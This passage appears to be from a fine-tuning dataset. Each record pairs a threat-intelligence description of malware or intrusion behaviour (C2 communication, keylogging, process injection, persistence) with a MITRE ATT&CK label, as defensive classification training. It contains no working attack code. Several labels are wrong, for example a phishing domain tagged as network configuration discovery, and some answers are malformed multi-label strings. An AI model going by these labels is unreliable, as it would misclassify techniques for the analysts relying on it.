- "content": "The actors used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144 to gain privileged remote code execution on vulnerable Microsoft Exchange servers. In some cases, this exploitation occurred after valid credentials were identified by password spray, as these vulnerabilities require authentication as a valid user."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "runs the net view /domain and net view commands."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to upload and download files from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of logging keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kasidet has the ability to initiate keylogging and screen captures."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Much like the original payload, this tool uses if/else statements to skip the legitimate code in the Saransh Email System source to run the malicious functions, which have the same method names as the original tool and follow the same call sequence: Form1.Speed Form1.diomadnfagaghagh Form1.fjcsERIfjfiojsGHIsdifjksi Form1.gsgjIDJIGJIGJIGJIFDOSpl Form1.FJaioefgkaoeK This chain of functions eventually loads a resource named ‘GSrdofjksrgj’, which the tool decrypts using the same algorithm and key as in the initial payload:byte[] array4 = new byte[] { 19, 129, 43, 37, 56, 65, 255, 75, 111, 19, 211, 120, 0, 49, 126, 248 };The decrypted payload has a SHA256 hash of 5e805a88294f6d25d55103d19d13e798e01ad70e6b89e9c58db5d468cc63b3d5, which is a variant of the NanoCore remote administration tool"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideCopy uses a loader DLL file to collect AV product names from an infected host."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used the Plink utility and other tools to create tunnels to C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda decrypts strings in the code during the execution process."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D has a variant that is packed with UPX."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JSS Loader can download and execute JavaScript files."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windigo has used a script to check for the presence of files created by OpenSSH backdoors."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has sent emails with malicious DOCX, CHM, LNK and ZIP attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KeyBoy uses Python scripts for installing files and performing execution."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "There are three types of URLs present in the decrypted configuration. The first type of URL listed in the configuration data is used for the plain HTTP (that is, non-Tor) communication with C&C servers. The bot reports to the C&C server using the typical request pattern: for example, the initial checkin to the C&C server is in the form of: cfg_url + “/images/” + encoded_data + (.jpeg||.gif||.bmp"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QAKBOT uses obfuscation across two script files, a JavaScript (.js) file and a Batch Script (.cmd) file, likely in an effort to conceal suspicious-looking command lines. "
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Actors used the netstat command to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Orz can gather victim drive information."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "H1N1 bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe)."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their newly created account every eight hours"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL has downloaded additional files from the C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hooking module – hooks a hardcoded set of WinAPI and (if they exist) Mozilla DLL Hooking is used to perform web injects, sniff traffic and keyboard data and even prevent DNS resolution of certain domains. Hooking works in the following way: QakBot injects a hooking module into the appropriate process, the module finds functions from the hardcoded set and modifies the functions so they jump to custom code"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The developer rewrote a large part of the code however the workflow is the same as previously and some features are copy/paste. The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore but all the communications are performed with WinInet. The malware performs connection to the C2 server by using InternetOpenA() with an hardcoded User-Agent: \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322\". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011. The code is not exactly the same but the workflow and some constants are similar"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM used WMI for execution to assist in lateral movement as well as for installing tools across multiple assets."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk registers as a service under the Plug-And-Play Support name."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Here is an example of the result of ps ax on an infected system: $ ps ax[...] 566 ?? Ss 0:00.01 /usr/libexec/icloudsyncd -launchd netlogon.bundle[...] Figure 8: Result of ps ax on an infected system Keychain stealing The OSX/Keydnap backdoor is equipped with a mechanism to gather and exfiltrate passwords and keys stored in OS X’s keychain"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In April 2018 we discovered a new Octopus sample pretending to be Telegram Messenger with a Russian interface. We couldn´t find any legitimate software that this malware appears to be impersonating; in fact, we don´t believe it exists. Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A version of XTunnel introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "master boot record wiper"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host)."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Scheduled Task. LockBit 2.0 can be executed via scheduled tasks."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS can retrieve IP, network adapter configuration information, and domain from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "fprii.net 185.130.212.254 Domain used for spear phish sender e-mail address and to host malicious documents"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It can download and execute arbitrary code provided from the C&C server, as well as maintain a virtual file system (VFS) inside the registry. The VFS, and any additional files created by the code, are encrypted and stored in a location unique to each victim"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has checked for the existence of specific files including \"/usr/sbin/setenforce\" and \" /etc/selinux/config\". It also has the ability to monitor the cryptocurrency miner file and process."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes payloads using the Windows API call CreateProcessW()."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used the PowerShell filenames Office365DCOMCheck.ps1 and SystemDiskClean.ps1."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates then deletes log files during installation of itself as a service."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Spreadsheets and documents with customer lists, investments and trading operations - Internal presentations - Software licenses and credentials for trading software/platforms - Cookies and session information from browsers - Email credentials - Customer credit card information and proof of address/identity documents"
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PowerShell command executed after the Microsoft Exchange exploitation is responsible for downloading and executing another PowerShell script from the command-and-control (C&C) server 185[.]82[.]219[.]201"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1064 - Scripting', 'T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson contains commands to list files and directories, as well as search for files matching certain extensions from a defined list."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST collected information from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CSPY Downloader has come signed with revoked certificates."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can upload and download to/from a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can collect Microsoft Word documents from the target's file system, as well as \".txt\", \".doc\", and \".xls\" files from the Internet Explorer cache."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuditCred can inject code from files to other running processes."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has used HTTP for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has removed a targeted organization's global admin accounts to lock the organization out of all access."
- },
- {
- "role": "assistant",
- "content": "T1531 - Account Access Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The JHUHUGIT dropper can delete itself from the victim. Another JHUHUGIT variant has the capability to delete specified files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla can add itself to the Registry as a startup program to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects a unique identifier (UID) from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Perhaps the most interesting part here is the unusual command and control mechanism based on TCP/UDP packets, as well as the C&C hostname which fits previously known Turla activity"
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "scans processes on all victim systems in the environment and uses automated scripts to pull back the results."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used PowerShell for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Night Dragon has used several remote administration tools as persistent infiltration channels."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has used malware to identify installed software."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has been distributed through malicious links contained within spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware used by is capable of remotely deleting files from victims."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CORESHELL C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult can collect a list of running processes by calling CreateToolhelp32Snapshot."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WINERACK can enumerate active windows."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database ntds.dit."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may collect information about the system by running hostname and systeminfo on a victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoxCaon can execute arbitrary commands and utilize the \"ComSpec\" environment variable."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT sent username, computer name, and the previously generated UUID in reply to a \"who\" command from C2."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has used the command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Turla Javascript backdoor added a local_update_check value under the Registry key \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" to establish persistence. Additionally, a Turla custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
